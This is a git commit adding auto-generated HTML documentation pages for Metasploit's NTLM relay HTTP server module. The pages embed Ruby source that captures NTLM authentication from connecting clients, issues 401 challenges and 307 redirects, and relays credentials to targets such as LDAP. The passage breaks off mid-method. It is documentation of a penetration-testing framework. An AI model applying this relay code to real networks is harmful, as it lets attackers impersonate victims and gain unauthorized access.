Reboot gh-pages

This commit is contained in:
jenkins-metasploit
2026-05-08 17:08:43 +00:00
commit c3f5bd3de2
3540 changed files with 2281201 additions and 0 deletions
@@ -0,0 +1,115 @@
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>
Module: Msf::Exploit::Remote::HttpServer::Relay::NTLM
&mdash; Documentation by YARD 0.9.37
</title>
<link rel="stylesheet" href="../../../../../css/style.css" type="text/css" />
<link rel="stylesheet" href="../../../../../css/common.css" type="text/css" />
<script type="text/javascript">
pathId = "Msf::Exploit::Remote::HttpServer::Relay::NTLM";
relpath = '../../../../../';
</script>
<script type="text/javascript" charset="utf-8" src="../../../../../js/jquery.js"></script>
<script type="text/javascript" charset="utf-8" src="../../../../../js/app.js"></script>
</head>
<body>
<div class="nav_wrap">
<iframe id="nav" src="../../../../../class_list.html?1"></iframe>
<div id="resizer"></div>
</div>
<div id="main" tabindex="-1">
<div id="header">
<div id="menu">
<a href="../../../../../_index.html">Index (N)</a> &raquo;
<span class='title'><span class='object_link'><a href="../../../../../Msf.html" title="Msf (module)">Msf</a></span></span> &raquo; <span class='title'><span class='object_link'><a href="../../../../Exploit.html" title="Msf::Exploit (class)">Exploit</a></span></span> &raquo; <span class='title'><span class='object_link'><a href="../../../Remote.html" title="Msf::Exploit::Remote (class)">Remote</a></span></span> &raquo; <span class='title'><span class='object_link'><a href="../../HttpServer.html" title="Msf::Exploit::Remote::HttpServer (module)">HttpServer</a></span></span> &raquo; <span class='title'><span class='object_link'><a href="../Relay.html" title="Msf::Exploit::Remote::HttpServer::Relay (module)">Relay</a></span></span>
&raquo;
<span class="title">NTLM</span>
</div>
<div id="search">
<a class="full_list_link" id="class_list_link"
href="../../../../../class_list.html">
<svg width="24" height="24">
<rect x="0" y="4" width="24" height="4" rx="1" ry="1"></rect>
<rect x="0" y="12" width="24" height="4" rx="1" ry="1"></rect>
<rect x="0" y="20" width="24" height="4" rx="1" ry="1"></rect>
</svg>
</a>
</div>
<div class="clear"></div>
</div>
<div id="content"><h1>Module: Msf::Exploit::Remote::HttpServer::Relay::NTLM
</h1>
<div class="box_info">
<dl>
<dt>Defined in:</dt>
<dd>lib/msf/core/exploit/remote/http_server/relay/ntlm/server_client.rb</dd>
</dl>
</div>
<h2>Defined Under Namespace</h2>
<p class="children">
<strong class="classes">Classes:</strong> <span class='object_link'><a href="NTLM/ServerClient.html" title="Msf::Exploit::Remote::HttpServer::Relay::NTLM::ServerClient (class)">ServerClient</a></span>
</p>
</div>
<div id="footer">
Generated on Fri May 8 17:02:50 2026 by
<a href="https://yardoc.org" title="Yay! A Ruby Documentation Tool" target="_parent">yard</a>
0.9.37 (ruby-3.1.5).
</div>
</div>
</body>
</html>
@@ -0,0 +1,1659 @@
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>
Class: Msf::Exploit::Remote::HttpServer::Relay::NTLM::ServerClient
&mdash; Documentation by YARD 0.9.37
</title>
<link rel="stylesheet" href="../../../../../../css/style.css" type="text/css" />
<link rel="stylesheet" href="../../../../../../css/common.css" type="text/css" />
<script type="text/javascript">
pathId = "Msf::Exploit::Remote::HttpServer::Relay::NTLM::ServerClient";
relpath = '../../../../../../';
</script>
<script type="text/javascript" charset="utf-8" src="../../../../../../js/jquery.js"></script>
<script type="text/javascript" charset="utf-8" src="../../../../../../js/app.js"></script>
</head>
<body>
<div class="nav_wrap">
<iframe id="nav" src="../../../../../../class_list.html?1"></iframe>
<div id="resizer"></div>
</div>
<div id="main" tabindex="-1">
<div id="header">
<div id="menu">
<a href="../../../../../../_index.html">Index (S)</a> &raquo;
<span class='title'><span class='object_link'><a href="../../../../../../Msf.html" title="Msf (module)">Msf</a></span></span> &raquo; <span class='title'><span class='object_link'><a href="../../../../../Exploit.html" title="Msf::Exploit (class)">Exploit</a></span></span> &raquo; <span class='title'><span class='object_link'><a href="../../../../Remote.html" title="Msf::Exploit::Remote (class)">Remote</a></span></span> &raquo; <span class='title'><span class='object_link'><a href="../../../HttpServer.html" title="Msf::Exploit::Remote::HttpServer (module)">HttpServer</a></span></span> &raquo; <span class='title'><span class='object_link'><a href="../../Relay.html" title="Msf::Exploit::Remote::HttpServer::Relay (module)">Relay</a></span></span> &raquo; <span class='title'><span class='object_link'><a href="../NTLM.html" title="Msf::Exploit::Remote::HttpServer::Relay::NTLM (module)">NTLM</a></span></span>
&raquo;
<span class="title">ServerClient</span>
</div>
<div id="search">
<a class="full_list_link" id="class_list_link"
href="../../../../../../class_list.html">
<svg width="24" height="24">
<rect x="0" y="4" width="24" height="4" rx="1" ry="1"></rect>
<rect x="0" y="12" width="24" height="4" rx="1" ry="1"></rect>
<rect x="0" y="20" width="24" height="4" rx="1" ry="1"></rect>
</svg>
</a>
</div>
<div class="clear"></div>
</div>
<div id="content"><h1>Class: Msf::Exploit::Remote::HttpServer::Relay::NTLM::ServerClient
</h1>
<div class="box_info">
<dl>
<dt>Inherits:</dt>
<dd>
<span class="inheritName">Object</span>
<ul class="fullTree">
<li>Object</li>
<li class="next">Msf::Exploit::Remote::HttpServer::Relay::NTLM::ServerClient</li>
</ul>
<a href="#" class="inheritanceTree">show all</a>
</dd>
</dl>
<dl>
<dt>Defined in:</dt>
<dd>lib/msf/core/exploit/remote/http_server/relay/ntlm/server_client.rb</dd>
</dl>
</div>
<h2>Instance Attribute Summary <small><a href="#" class="summary_toggle">collapse</a></small></h2>
<ul class="summary">
<li class="public ">
<span class="summary_signature">
<a href="#cli-instance_method" title="#cli (instance method)">#<strong>cli</strong> &#x21d2; Object </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Returns the value of attribute cli.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#logger-instance_method" title="#logger (instance method)">#<strong>logger</strong> &#x21d2; Object </a>
</span>
<span class="note title readonly">readonly</span>
<span class="summary_desc"><div class='inline'>
<p>Returns the value of attribute logger.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#redirect_uri-instance_method" title="#redirect_uri (instance method)">#<strong>redirect_uri</strong> &#x21d2; Object </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Returns the value of attribute redirect_uri.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#state-instance_method" title="#state (instance method)">#<strong>state</strong> &#x21d2; Object </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Returns the value of attribute state.</p>
</div></span>
</li>
</ul>
<h2>
Instance Method Summary
<small><a href="#" class="summary_toggle">collapse</a></small>
</h2>
<ul class="summary">
<li class="public ">
<span class="summary_signature">
<a href="#abort_connection-instance_method" title="#abort_connection (instance method)">#<strong>abort_connection</strong>(reason) &#x21d2; Object </a>
</span>
<span class="summary_desc"><div class='inline'></div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#advance_to_next_target_via_redirect-instance_method" title="#advance_to_next_target_via_redirect (instance method)">#<strong>advance_to_next_target_via_redirect</strong> &#x21d2; Object </a>
</span>
<span class="summary_desc"><div class='inline'></div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#complete_current_relay_attempt-instance_method" title="#complete_current_relay_attempt (instance method)">#<strong>complete_current_relay_attempt</strong>(is_success:, identity: nil) &#x21d2; Object </a>
</span>
<span class="summary_desc"><div class='inline'></div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#create_relay_client-instance_method" title="#create_relay_client (instance method)">#<strong>create_relay_client</strong>(target, timeout) &#x21d2; Object </a>
</span>
<span class="summary_desc"><div class='inline'></div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#extract_ntlm_message-instance_method" title="#extract_ntlm_message (instance method)">#<strong>extract_ntlm_message</strong>(auth_header) &#x21d2; Object </a>
</span>
<span class="summary_desc"><div class='inline'></div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#finished%3F-instance_method" title="#finished? (instance method)">#<strong>finished?</strong> &#x21d2; Boolean </a>
</span>
<span class="summary_desc"><div class='inline'></div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#handle_type1-instance_method" title="#handle_type1 (instance method)">#<strong>handle_type1</strong>(raw_ntlm_bytes, parsed_ntlm, auth_type) &#x21d2; Object </a>
</span>
<span class="summary_desc"><div class='inline'></div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#handle_type3-instance_method" title="#handle_type3 (instance method)">#<strong>handle_type3</strong>(parsed_type3) &#x21d2; Object </a>
</span>
<span class="summary_desc"><div class='inline'></div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#initialize-instance_method" title="#initialize (instance method)">#<strong>initialize</strong>(cli, relay_targets, logger, timeout = 25) &#x21d2; ServerClient </a>
</span>
<span class="note title constructor">constructor</span>
<span class="summary_desc"><div class='inline'>
<p>A new instance of ServerClient.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#process_request-instance_method" title="#process_request (instance method)">#<strong>process_request</strong>(req) &#x21d2; Object </a>
</span>
<span class="summary_desc"><div class='inline'></div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#send_401_challenge-instance_method" title="#send_401_challenge (instance method)">#<strong>send_401_challenge</strong> &#x21d2; Object </a>
</span>
<span class="summary_desc"><div class='inline'></div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#unwrap_ntlm_base64-instance_method" title="#unwrap_ntlm_base64 (instance method)">#<strong>unwrap_ntlm_base64</strong>(b64_msg) &#x21d2; Object </a>
</span>
<span class="summary_desc"><div class='inline'></div></span>
</li>
</ul>
<div id="constructor_details" class="method_details_list">
<h2>Constructor Details</h2>
<div class="method_details first">
<h3 class="signature first" id="initialize-instance_method">
#<strong>initialize</strong>(cli, relay_targets, logger, timeout = 25) &#x21d2; <tt><span class='object_link'><a href="" title="Msf::Exploit::Remote::HttpServer::Relay::NTLM::ServerClient (class)">ServerClient</a></span></tt>
</h3><div class="docstring">
<div class="discussion">
<p>Returns a new instance of ServerClient.</p>
</div>
</div>
<div class="tags">
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/http_server/relay/ntlm/server_client.rb', line 9</span>
<span class='kw'>def</span> <span class='id identifier rubyid_initialize'>initialize</span><span class='lparen'>(</span><span class='id identifier rubyid_cli'>cli</span><span class='comma'>,</span> <span class='id identifier rubyid_relay_targets'>relay_targets</span><span class='comma'>,</span> <span class='id identifier rubyid_logger'>logger</span><span class='comma'>,</span> <span class='id identifier rubyid_timeout'>timeout</span> <span class='op'>=</span> <span class='int'>25</span><span class='rparen'>)</span>
<span class='ivar'>@cli</span> <span class='op'>=</span> <span class='id identifier rubyid_cli'>cli</span>
<span class='ivar'>@state</span> <span class='op'>=</span> <span class='symbol'>:unauthenticated</span>
<span class='ivar'>@relay_targets</span> <span class='op'>=</span> <span class='id identifier rubyid_relay_targets'>relay_targets</span>
<span class='ivar'>@logger</span> <span class='op'>=</span> <span class='id identifier rubyid_logger'>logger</span>
<span class='ivar'>@timeout</span> <span class='op'>=</span> <span class='id identifier rubyid_timeout'>timeout</span>
<span class='ivar'>@relayed_connection</span> <span class='op'>=</span> <span class='kw'>nil</span>
<span class='ivar'>@current_target</span> <span class='op'>=</span> <span class='kw'>nil</span>
<span class='ivar'>@ntlm_context</span> <span class='op'>=</span> <span class='lbrace'>{</span>
<span class='label'>wrapper:</span> <span class='symbol'>:none</span><span class='comma'>,</span>
<span class='label'>type1:</span> <span class='kw'>nil</span><span class='comma'>,</span>
<span class='label'>type2:</span> <span class='kw'>nil</span>
<span class='rbrace'>}</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
</div>
<div id="instance_attr_details" class="attr_details">
<h2>Instance Attribute Details</h2>
<span id="cli=-instance_method"></span>
<div class="method_details first">
<h3 class="signature first" id="cli-instance_method">
#<strong>cli</strong> &#x21d2; <tt>Object</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Returns the value of attribute cli.</p>
</div>
</div>
<div class="tags">
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
7
8
9</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/http_server/relay/ntlm/server_client.rb', line 7</span>
<span class='kw'>def</span> <span class='id identifier rubyid_cli'>cli</span>
<span class='ivar'>@cli</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<span id=""></span>
<div class="method_details ">
<h3 class="signature " id="logger-instance_method">
#<strong>logger</strong> &#x21d2; <tt>Object</tt> <span class="extras">(readonly)</span>
</h3><div class="docstring">
<div class="discussion">
<p>Returns the value of attribute logger.</p>
</div>
</div>
<div class="tags">
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
6
7
8</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/http_server/relay/ntlm/server_client.rb', line 6</span>
<span class='kw'>def</span> <span class='id identifier rubyid_logger'>logger</span>
<span class='ivar'>@logger</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<span id="redirect_uri=-instance_method"></span>
<div class="method_details ">
<h3 class="signature " id="redirect_uri-instance_method">
#<strong>redirect_uri</strong> &#x21d2; <tt>Object</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Returns the value of attribute redirect_uri.</p>
</div>
</div>
<div class="tags">
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
7
8
9</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/http_server/relay/ntlm/server_client.rb', line 7</span>
<span class='kw'>def</span> <span class='id identifier rubyid_redirect_uri'>redirect_uri</span>
<span class='ivar'>@redirect_uri</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<span id="state=-instance_method"></span>
<div class="method_details ">
<h3 class="signature " id="state-instance_method">
#<strong>state</strong> &#x21d2; <tt>Object</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Returns the value of attribute state.</p>
</div>
</div>
<div class="tags">
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
7
8
9</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/http_server/relay/ntlm/server_client.rb', line 7</span>
<span class='kw'>def</span> <span class='id identifier rubyid_state'>state</span>
<span class='ivar'>@state</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
</div>
<div id="instance_method_details" class="method_details_list">
<h2>Instance Method Details</h2>
<div class="method_details first">
<h3 class="signature first" id="abort_connection-instance_method">
#<strong>abort_connection</strong>(reason) &#x21d2; <tt>Object</tt>
</h3><table class="source_code">
<tr>
<td>
<pre class="lines">
282
283
284
285
286
287
288
289
290
291
292
293</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/http_server/relay/ntlm/server_client.rb', line 282</span>
<span class='kw'>def</span> <span class='id identifier rubyid_abort_connection'>abort_connection</span><span class='lparen'>(</span><span class='id identifier rubyid_reason'>reason</span><span class='rparen'>)</span>
<span class='id identifier rubyid_logger'>logger</span><span class='period'>.</span><span class='id identifier rubyid_print_error'>print_error</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Aborting connection with </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_cli'>cli</span><span class='period'>.</span><span class='id identifier rubyid_peerhost'>peerhost</span><span class='embexpr_end'>}</span><span class='tstring_content'>: </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_reason'>reason</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_res'>res</span> <span class='op'>=</span> <span class='const'><span class='object_link'><a href="../../../../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../../../Rex/Proto.html" title="Rex::Proto (module)">Proto</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../../../Rex/Proto/Http.html" title="Rex::Proto::Http (module)">Http</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../../../Rex/Proto/Http/Response.html" title="Rex::Proto::Http::Response (class)">Response</a></span></span><span class='period'>.</span><span class='id identifier rubyid_new'><span class='object_link'><a href="../../../../../../Rex/Proto/Http/Response.html#initialize-instance_method" title="Rex::Proto::Http::Response#initialize (method)">new</a></span></span>
<span class='id identifier rubyid_res'>res</span><span class='period'>.</span><span class='id identifier rubyid_code'>code</span> <span class='op'>=</span> <span class='int'>400</span>
<span class='id identifier rubyid_res'>res</span><span class='period'>.</span><span class='id identifier rubyid_message'>message</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Bad Request</span><span class='tstring_end'>&quot;</span></span>
<span class='id identifier rubyid_res'>res</span><span class='period'>.</span><span class='id identifier rubyid_headers'>headers</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Connection</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Close</span><span class='tstring_end'>&quot;</span></span>
<span class='id identifier rubyid_res'>res</span><span class='period'>.</span><span class='id identifier rubyid_headers'>headers</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Content-Length</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>0</span><span class='tstring_end'>&quot;</span></span>
<span class='id identifier rubyid_res'>res</span><span class='period'>.</span><span class='id identifier rubyid_body'>body</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_end'>&quot;</span></span>
<span class='id identifier rubyid_cli'>cli</span><span class='period'>.</span><span class='id identifier rubyid_put'>put</span><span class='lparen'>(</span><span class='id identifier rubyid_res'>res</span><span class='period'>.</span><span class='id identifier rubyid_to_s'>to_s</span><span class='rparen'>)</span>
<span class='ivar'>@state</span> <span class='op'>=</span> <span class='symbol'>:aborted</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="advance_to_next_target_via_redirect-instance_method">
#<strong>advance_to_next_target_via_redirect</strong> &#x21d2; <tt>Object</tt>
</h3><table class="source_code">
<tr>
<td>
<pre class="lines">
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/http_server/relay/ntlm/server_client.rb', line 248</span>
<span class='kw'>def</span> <span class='id identifier rubyid_advance_to_next_target_via_redirect'>advance_to_next_target_via_redirect</span>
<span class='ivar'>@current_target</span> <span class='op'>=</span> <span class='ivar'>@relay_targets</span><span class='period'>.</span><span class='id identifier rubyid_next'>next</span><span class='lparen'>(</span><span class='ivar'>@cli</span><span class='period'>.</span><span class='id identifier rubyid_peerhost'>peerhost</span><span class='rparen'>)</span>
<span class='kw'>if</span> <span class='ivar'>@current_target</span>
<span class='id identifier rubyid_random_path'>random_path</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>/</span><span class='tstring_end'>&quot;</span></span> <span class='op'>+</span> <span class='const'><span class='object_link'><a href="../../../../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'>Text</span><span class='period'>.</span><span class='id identifier rubyid_rand_text_alphanumeric'>rand_text_alphanumeric</span><span class='lparen'>(</span><span class='int'>10</span><span class='rparen'>)</span>
<span class='ivar'>@redirect_uri</span> <span class='op'>=</span> <span class='id identifier rubyid_random_path'>random_path</span>
<span class='ivar'>@logger</span><span class='period'>.</span><span class='id identifier rubyid_print_status'>print_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Moving to next target (</span><span class='embexpr_beg'>#{</span><span class='ivar'>@current_target</span><span class='period'>.</span><span class='id identifier rubyid_ip'>ip</span><span class='embexpr_end'>}</span><span class='tstring_content'>). Issuing 307 Redirect to </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_random_path'>random_path</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_res'>res</span> <span class='op'>=</span> <span class='const'><span class='object_link'><a href="../../../../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../../../Rex/Proto.html" title="Rex::Proto (module)">Proto</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../../../Rex/Proto/Http.html" title="Rex::Proto::Http (module)">Http</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../../../Rex/Proto/Http/Response.html" title="Rex::Proto::Http::Response (class)">Response</a></span></span><span class='period'>.</span><span class='id identifier rubyid_new'><span class='object_link'><a href="../../../../../../Rex/Proto/Http/Response.html#initialize-instance_method" title="Rex::Proto::Http::Response#initialize (method)">new</a></span></span>
<span class='id identifier rubyid_res'>res</span><span class='period'>.</span><span class='id identifier rubyid_code'>code</span> <span class='op'>=</span> <span class='int'>307</span>
<span class='id identifier rubyid_res'>res</span><span class='period'>.</span><span class='id identifier rubyid_message'>message</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Temporary Redirect</span><span class='tstring_end'>&quot;</span></span>
<span class='id identifier rubyid_res'>res</span><span class='period'>.</span><span class='id identifier rubyid_headers'>headers</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Location</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span> <span class='op'>=</span> <span class='id identifier rubyid_random_path'>random_path</span>
<span class='id identifier rubyid_res'>res</span><span class='period'>.</span><span class='id identifier rubyid_headers'>headers</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Connection</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>keep-alive</span><span class='tstring_end'>&quot;</span></span>
<span class='id identifier rubyid_res'>res</span><span class='period'>.</span><span class='id identifier rubyid_headers'>headers</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Content-Length</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>0</span><span class='tstring_end'>&quot;</span></span>
<span class='id identifier rubyid_cli'>cli</span><span class='period'>.</span><span class='id identifier rubyid_send_response'>send_response</span><span class='lparen'>(</span><span class='id identifier rubyid_res'>res</span><span class='rparen'>)</span>
<span class='ivar'>@state</span> <span class='op'>=</span> <span class='symbol'>:unauthenticated</span>
<span class='ivar'>@ntlm_context</span><span class='lbracket'>[</span><span class='symbol'>:type1</span><span class='rbracket'>]</span> <span class='op'>=</span> <span class='kw'>nil</span>
<span class='ivar'>@ntlm_context</span><span class='lbracket'>[</span><span class='symbol'>:type2</span><span class='rbracket'>]</span> <span class='op'>=</span> <span class='kw'>nil</span>
<span class='kw'>else</span>
<span class='ivar'>@logger</span><span class='period'>.</span><span class='id identifier rubyid_print_status'>print_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Target list exhausted for </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_cli'>cli</span><span class='period'>.</span><span class='id identifier rubyid_peerhost'>peerhost</span><span class='embexpr_end'>}</span><span class='tstring_content'>. Closing connection.</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_res'>res</span> <span class='op'>=</span> <span class='const'><span class='object_link'><a href="../../../../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../../../Rex/Proto.html" title="Rex::Proto (module)">Proto</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../../../Rex/Proto/Http.html" title="Rex::Proto::Http (module)">Http</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../../../Rex/Proto/Http/Response.html" title="Rex::Proto::Http::Response (class)">Response</a></span></span><span class='period'>.</span><span class='id identifier rubyid_new'><span class='object_link'><a href="../../../../../../Rex/Proto/Http/Response.html#initialize-instance_method" title="Rex::Proto::Http::Response#initialize (method)">new</a></span></span>
<span class='id identifier rubyid_res'>res</span><span class='period'>.</span><span class='id identifier rubyid_code'>code</span> <span class='op'>=</span> <span class='int'>404</span>
<span class='id identifier rubyid_res'>res</span><span class='period'>.</span><span class='id identifier rubyid_message'>message</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Not Found</span><span class='tstring_end'>&quot;</span></span>
<span class='id identifier rubyid_res'>res</span><span class='period'>.</span><span class='id identifier rubyid_headers'>headers</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Connection</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>close</span><span class='tstring_end'>&quot;</span></span>
<span class='id identifier rubyid_res'>res</span><span class='period'>.</span><span class='id identifier rubyid_headers'>headers</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Content-Length</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>0</span><span class='tstring_end'>&quot;</span></span>
<span class='id identifier rubyid_cli'>cli</span><span class='period'>.</span><span class='id identifier rubyid_send_response'>send_response</span><span class='lparen'>(</span><span class='id identifier rubyid_res'>res</span><span class='rparen'>)</span>
<span class='ivar'>@state</span> <span class='op'>=</span> <span class='symbol'>:done</span>
<span class='kw'>end</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="complete_current_relay_attempt-instance_method">
#<strong>complete_current_relay_attempt</strong>(is_success:, identity: nil) &#x21d2; <tt>Object</tt>
</h3><table class="source_code">
<tr>
<td>
<pre class="lines">
183
184
185
186
187</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/http_server/relay/ntlm/server_client.rb', line 183</span>
<span class='kw'>def</span> <span class='id identifier rubyid_complete_current_relay_attempt'>complete_current_relay_attempt</span><span class='lparen'>(</span><span class='label'>is_success:</span><span class='comma'>,</span> <span class='label'>identity:</span> <span class='kw'>nil</span><span class='rparen'>)</span>
<span class='kw'>return</span> <span class='kw'>unless</span> <span class='ivar'>@current_target</span>
<span class='ivar'>@relay_targets</span><span class='period'>.</span><span class='id identifier rubyid_on_relay_end'>on_relay_end</span><span class='lparen'>(</span><span class='ivar'>@current_target</span><span class='comma'>,</span> <span class='label'>identity:</span> <span class='id identifier rubyid_identity'>identity</span><span class='comma'>,</span> <span class='label'>is_success:</span> <span class='id identifier rubyid_is_success'>is_success</span><span class='rparen'>)</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="create_relay_client-instance_method">
#<strong>create_relay_client</strong>(target, timeout) &#x21d2; <tt>Object</tt>
</h3><table class="source_code">
<tr>
<td>
<pre class="lines">
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/http_server/relay/ntlm/server_client.rb', line 75</span>
<span class='kw'>def</span> <span class='id identifier rubyid_create_relay_client'>create_relay_client</span><span class='lparen'>(</span><span class='id identifier rubyid_target'>target</span><span class='comma'>,</span> <span class='id identifier rubyid_timeout'>timeout</span><span class='rparen'>)</span>
<span class='kw'>case</span> <span class='id identifier rubyid_target'>target</span><span class='period'>.</span><span class='id identifier rubyid_protocol'>protocol</span>
<span class='kw'>when</span> <span class='symbol'>:ldap</span>
<span class='id identifier rubyid_client'>client</span> <span class='op'>=</span> <span class='const'><span class='object_link'><a href="../../../../../../Msf.html" title="Msf (module)">Msf</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../../Exploit.html" title="Msf::Exploit (class)">Exploit</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../Remote.html" title="Msf::Exploit::Remote (class)">Remote</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../Relay.html" title="Msf::Exploit::Remote::Relay (module)">Relay</a></span></span><span class='op'>::</span><span class='const'>NTLM</span><span class='op'>::</span><span class='const'>Target</span><span class='op'>::</span><span class='const'>LDAP</span><span class='op'>::</span><span class='const'>Client</span><span class='period'>.</span><span class='id identifier rubyid_create'>create</span><span class='lparen'>(</span><span class='kw'>self</span><span class='comma'>,</span> <span class='id identifier rubyid_target'>target</span><span class='comma'>,</span> <span class='id identifier rubyid_logger'>logger</span><span class='comma'>,</span> <span class='id identifier rubyid_timeout'>timeout</span><span class='rparen'>)</span>
<span class='kw'>else</span>
